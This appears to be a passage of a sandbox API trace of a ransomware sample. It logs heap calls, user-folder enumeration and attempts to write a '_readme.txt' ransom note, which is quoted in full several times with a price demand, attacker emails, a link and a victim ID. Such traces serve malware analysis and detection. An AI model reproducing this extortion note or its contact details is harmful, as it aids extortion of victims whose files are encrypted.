0x328ec10 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.691] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.691] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.692] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.692] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.692] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.692] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.692] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.692] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.692] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.692] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.692] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.692] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.692] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.692] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.692] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.692] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.692] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.692] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.692] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0146.692] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.692] PathFindFileNameW (pszPath="") returned="" [0146.692] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.693] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.693] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.693] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.693] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.693] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.693] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240bb8 | out: hHeap=0x6e0000) returned 1 [0146.693] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0146.693] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0146.694] lstrcpyW (in: lpString1=0x3a66050, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0146.694] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0146.694] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.694] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328fd20 | out: hHeap=0x6e0000) returned 1 [0146.694] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a66050 | out: hHeap=0x6e0000) returned 1 [0146.694] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.694] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0xffffffff [0146.695] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240bb8 | out: hHeap=0x6e0000) returned 1 [0146.695] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.695] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.695] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b18 | out: hHeap=0x6e0000) returned 1 [0146.695] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.695] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.696] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.696] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.696] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.696] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.696] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.696] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.696] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.696] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.696] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.696] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.696] PathFindFileNameW (pszPath="") returned="" [0146.696] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.697] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.697] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.697] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.697] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240bb8 | out: hHeap=0x6e0000) returned 1 [0146.697] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.697] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.697] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.697] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.697] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.697] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0146.697] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6b98 [0146.697] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c70 [0146.697] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.697] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c70 | out: hHeap=0x6e0000) returned 1 [0146.697] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6b98 | out: hHeap=0x6e0000) returned 1 [0146.698] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0146.698] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.698] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7e8 [0146.698] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e740 [0146.698] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7e8 | out: hHeap=0x6e0000) returned 1 [0146.698] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.698] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0146.698] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.698] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7e8 [0146.698] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e698 [0146.698] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7e8 | out: hHeap=0x6e0000) returned 1 [0146.698] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.698] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0146.698] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.698] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7e8 [0146.699] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e6d0 [0146.699] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7e8 | out: hHeap=0x6e0000) returned 1 [0146.699] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.699] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.699] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.699] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.699] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.699] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0146.699] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.699] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0146.699] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.699] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.699] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0146.699] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.699] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.699] 